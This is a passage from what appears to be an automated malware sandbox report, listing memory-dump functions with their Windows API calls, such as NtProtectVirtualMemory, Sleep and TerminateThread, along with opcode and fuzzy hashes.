                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID: (v#~
                • API String ID: 2706961497-497706869
                • Opcode ID: 8df8855147466043b3fafee3be6c2757db574435f4d483dfafa72b47499c7470
                • Instruction ID: 3a8dc6f2417320795155d3ea1e680b6859ab9298c5f82907c57a8148a487396a
                • Opcode Fuzzy Hash: 8df8855147466043b3fafee3be6c2757db574435f4d483dfafa72b47499c7470
                • Instruction Fuzzy Hash: C22130B85023019FEF345EAC85DB7563F59FF5A320BA1415DEC82C7166D721CCC64A25
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0056EED3, Relevance: 3.0, APIs: 2, Instructions: 38sleepCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: d6b8e715442860c553170c7d11118e1bf7d866eb4a8cf628ff931335ffffc572
                • Instruction ID: a3ea41e13fd1c2297a47bcd61f9fcd55b7901a9060fc0e5a90494ade34b58a08
                • Opcode Fuzzy Hash: d6b8e715442860c553170c7d11118e1bf7d866eb4a8cf628ff931335ffffc572
                • Instruction Fuzzy Hash: 4801BCB4946340CFF7588F24C88EB2ABBA8BF04365F258194E5118B1B6D3B4CC80CF12
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0056ED3B, Relevance: 1.6, APIs: 1, Instructions: 104nativeCOMMON
                Download Yara Rule
                APIs
                • NtProtectVirtualMemory.NTDLL(000000FF,00000008,0000000C,?,?,?,?,?,00000040,00000000,?), ref: 0056EE3B
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID:
                • API String ID: 2706961497-0
                • Opcode ID: 9bbe85bf0444ae7c78349fb688be378aa7bf9e3162cc274e3d1f29842df34879
                • Instruction ID: 9dae431f7ac9cb68a866881bf97bd0aabda67f51be8dad259f8503a09f2d22fd
                • Opcode Fuzzy Hash: 9bbe85bf0444ae7c78349fb688be378aa7bf9e3162cc274e3d1f29842df34879
                • Instruction Fuzzy Hash: D731AF782023019FEF248DAC86DA7973F96EF5A320F91816DEC87D7166D721CC868A15
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0056ED50, Relevance: 1.6, APIs: 1, Instructions: 95nativeCOMMON
                Download Yara Rule
                APIs
                • NtProtectVirtualMemory.NTDLL(000000FF,00000008,0000000C,?,?,?,?,?,00000040,00000000,?), ref: 0056EE3B
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID:
                • API String ID: 2706961497-0
                • Opcode ID: 91f11cebd485df8daab95a99851e673b8d2730abf930c2b0debb1942841053c8
                • Instruction ID: 88e0dd89080e6dc60354a6c73d86bded169412beb0b0fc514c9b6978f2b15b8e
                • Opcode Fuzzy Hash: 91f11cebd485df8daab95a99851e673b8d2730abf930c2b0debb1942841053c8
                • Instruction Fuzzy Hash: 17313978103301DFEF258E6DC5977463F66FF5A320B65429EDC818B266D732DC8A8A11
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0056EDD4, Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                Download Yara Rule
                APIs
                • NtProtectVirtualMemory.NTDLL(000000FF,00000008,0000000C,?,?,?,?,?,00000040,00000000,?), ref: 0056EE3B
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID:
                • API String ID: 2706961497-0
                • Opcode ID: f032f46a9f93d1c3383be7a3d1e10b06d4b25adac1051763d5ea898941c8a694
                • Instruction ID: bc8f111c1017bafaf0bcb5208f40552cee1eb2a908402a1f5481bc1aab24e561
                • Opcode Fuzzy Hash: f032f46a9f93d1c3383be7a3d1e10b06d4b25adac1051763d5ea898941c8a694
                • Instruction Fuzzy Hash: F011597A0072018FDB254E3C805A7867BA6FF57324379829DCC928B225CB36D48A8A51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0056EF19, Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                Download Yara Rule
                APIs
                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056EF89
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: MemoryProtectVirtual
                • String ID:
                • API String ID: 2706961497-0
                • Opcode ID: 6caa463588e3d281e5b76fac1363d63f82394c31355dbd104aa1b4d7cfa3943e
                • Instruction ID: 4d6cfcd8faae2cf9165734602e7971eef86f743dd9381704423673651faad842
                • Opcode Fuzzy Hash: 6caa463588e3d281e5b76fac1363d63f82394c31355dbd104aa1b4d7cfa3943e
                • Instruction Fuzzy Hash: EEF0E2B19422108FF7588E35880D75EBBA8EF103A5F258194E4608B1B5D3B888C08F42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0056EAE2, Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                Download Yara Rule
                APIs
                • TerminateThread.KERNEL32(8115E2CC,-89A3C4D4), ref: 0056EBA4
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: TerminateThread
                • String ID:
                • API String ID: 1852365436-0
                • Opcode ID: f550a2583beec6f6960b6c8c80ac3106b9322383d630b3f1906582ce0c006eed
                • Instruction ID: 28b44607e55aa4c309a7f45447513829d81eefaf77de8541aef2fdd9905429e1
                • Opcode Fuzzy Hash: f550a2583beec6f6960b6c8c80ac3106b9322383d630b3f1906582ce0c006eed
                • Instruction Fuzzy Hash: 5B2106B96153828FCBA49E38C9D979F7BD1BF55340F54595ADC8ACB561D331C880CB02
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0056EB98, Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                Download Yara Rule
                APIs
                • TerminateThread.KERNEL32(8115E2CC,-89A3C4D4), ref: 0056EBA4
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: TerminateThread
                • String ID:
                • API String ID: 1852365436-0
                • Opcode ID: 2e6a4185cec85418a7d87b65962ea0823077ab9260e31f9457d96e070119cf6e
                • Instruction ID: 98383dd27e16d9052afd88bcf09ef056cc3b6a76e63d2d14c563d3001c2855bb
                • Opcode Fuzzy Hash: 2e6a4185cec85418a7d87b65962ea0823077ab9260e31f9457d96e070119cf6e
                • Instruction Fuzzy Hash: 32F0287521A3828FDB544F34C4947AB77D2BF81754F2887A9CC468B1A1C735D884C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0056EEF8, Relevance: 1.3, APIs: 1, Instructions: 37sleepnativeCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNEL32(00000005), ref: 0056EF14
                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056EF89
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: MemoryProtectSleepVirtual
                • String ID:
                • API String ID: 3235210055-0
                • Opcode ID: debac975114b5772fb09efd28e7c08681c804bd947ff1733ef9b51ff0fb588d5
                • Instruction ID: 5bb2ee55eb29335b768211a56cb364252a601fc4600b1c579ba22cdad899591f
                • Opcode Fuzzy Hash: debac975114b5772fb09efd28e7c08681c804bd947ff1733ef9b51ff0fb588d5
                • Instruction Fuzzy Hash: 7AF0AF7940B242CFCB61CF25C08A604BB26FF0172AF2982D9D9040F266DB379896CA40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0056EEC7, Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000019.00000002.767189963.000000000056E000.00000040.00000001.sdmp, Offset: 0056E000, based on PE: false
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 572b7d3244c1a5b67a02befb875d3a69cf5607745cdcfe67a351b1ec86b8a0fe
                • Instruction ID: 362decd2b1baad4e7ee0ce6409226401b08c2fff5421f37c44bc7c17019c8152
                • Opcode Fuzzy Hash: 572b7d3244c1a5b67a02befb875d3a69cf5607745cdcfe67a351b1ec86b8a0fe
                • Instruction Fuzzy Hash: 21E08C7460A341CFE790ABA4848EB157AA07F08311F558090E6094B1A3C320CC80CB21
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions